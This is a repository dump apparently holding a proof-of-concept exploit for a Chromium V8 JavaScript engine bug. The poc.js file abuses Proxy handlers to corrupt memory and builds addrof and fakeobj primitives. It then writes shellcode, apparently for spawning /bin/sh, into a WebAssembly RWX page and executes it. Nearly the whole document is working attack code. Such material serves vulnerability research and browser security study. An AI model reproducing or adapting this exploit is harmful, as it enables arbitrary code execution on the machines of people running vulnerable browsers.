├── chromium-v8-exploit.pdf └── poc.js /chromium-v8-exploit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cosdong7/chromium-v8-exploit/HEAD/chromium-v8-exploit.pdf -------------------------------------------------------------------------------- /poc.js: -------------------------------------------------------------------------------- 1 | callFn = function(code) { 2 | try { 3 | code(); 4 | } catch (e) { 5 | console.log(e); 6 | } 7 | } 8 | 9 | let proxy = new Proxy({}, {}); 10 | 11 | function run(prop, ...args) { 12 | let handler = {}; 13 | const proxy = new Proxy(function() {}, handler); 14 | handler[prop] = (({ 15 | v1 = ((v2 = (function() { 16 | var v3 = 0; 17 | var callFn = 0; 18 | if (asdf) { 19 | return; 20 | } else { 21 | return; 22 | } 23 | (function() { 24 | v3(); 25 | }); 26 | (function() { 27 | callFn = "\u0041".repeat(1024 * 32); // mutate "run" 28 | v3 = [1.1, 2.2, 3.3]; // now "proxy" becomes a packed array. 29 | v4 = [{}].slice(); 30 | v5 = [4.4]; 31 | }) 32 | })) => (1))() 33 | }, ...args) => (1)); 34 | Reflect[prop](proxy, ...args); 35 | } 36 | 37 | callFn((() => (run("construct", [])))); 38 | callFn((() => (run("prop1")))); 39 | 40 | 41 | function test() { 42 | 43 | let convert = new ArrayBuffer(0x8); 44 | let f64 = new Float64Array(convert); 45 | let u32 = new Uint32Array(convert); 46 | 47 | 48 | function d2u(v) { 49 | f64[0] = v; 50 | return u32; 51 | } 52 | 53 | function u2d(lo, hi) { 54 | u32[0] = lo; 55 | u32[1] = hi; 56 | return f64[0]; 57 | } 58 | 59 | function hex(d) { 60 | let val = d2u(d); 61 | return ("0x" + (val[1] * 0x100000000 + val[0]).toString(16)); 62 | } 63 | 64 | 65 | let shellcode = [0x6a6848b8, 0x2f62696e, 0x2f2f2f73, 0x504889e7, 0x68726901, 0x1813424, 0x1010101, 0x31f656be, 0x1010101, 0x81f60901, 0x1014801, 0xe6564889, 0xe631d2b8, 0x01010101, 0x353a0101, 0x01900f05]; 66 | let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 7, 1, 96, 2, 127, 127, 1, 127, 3, 2, 1, 0, 4, 4, 1, 112, 0, 0, 5, 3, 1, 0, 1, 7, 21, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 8, 95, 90, 51, 97, 100, 100, 105, 105, 0, 0, 10, 9, 1, 7, 0, 32, 1, 32, 0, 106, 11]); 67 | let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {}); 68 | let f = wasm_mod.exports._Z3addii; 69 | 70 | run[18] = 0x41414141; 71 | if(proxy.length == 0x41414141){ 72 | print("exploit success!\n"); 73 | } 74 | else{ 75 | print("exploit fail TT\n"); 76 | } 77 | 78 | let addrof = function(obj) { 79 | v4[0] = obj; 80 | var leak = proxy[26]; 81 | return leak; 82 | } 83 | 84 | let fakeobj = function(addr) { 85 | proxy[26] = addr; 86 | var obj = v4[0]; 87 | return obj; 88 | } 89 | 90 | let ab = new ArrayBuffer(0x100); 91 | let abAddr = addrof(ab); 92 | print("array buffer : " + hex(abAddr)); 93 | 94 | 95 | let wasmObj = addrof(f) - u2d(0x108, 0); 96 | 97 | doubleMap = proxy[34]; 98 | 99 | var fake = [ 100 | doubleMap, 0, 101 | wasmObj, u2d(0, 0x8) 102 | ].slice(); 103 | var fakeAddr = addrof(fake) - u2d(0x20, 0); 104 | print("fake_addr : " + hex(fakeAddr)); 105 | var target = fakeobj(fakeAddr); 106 | 107 | let rwx = target[0]; 108 | print("rwx : " + hex(rwx)); 109 | fake[2] = abAddr + u2d(0x10, 0); 110 | target[0] = rwx; 111 | 112 | let dv = new DataView(ab); 113 | for (var i = 0; i < shellcode.length; i++) { 114 | dv.setUint32(i * 4, shellcode[i]); 115 | } 116 | f(); 117 | 118 | } 119 | 120 | test(); 121 | 122 | --------------------------------------------------------------------------------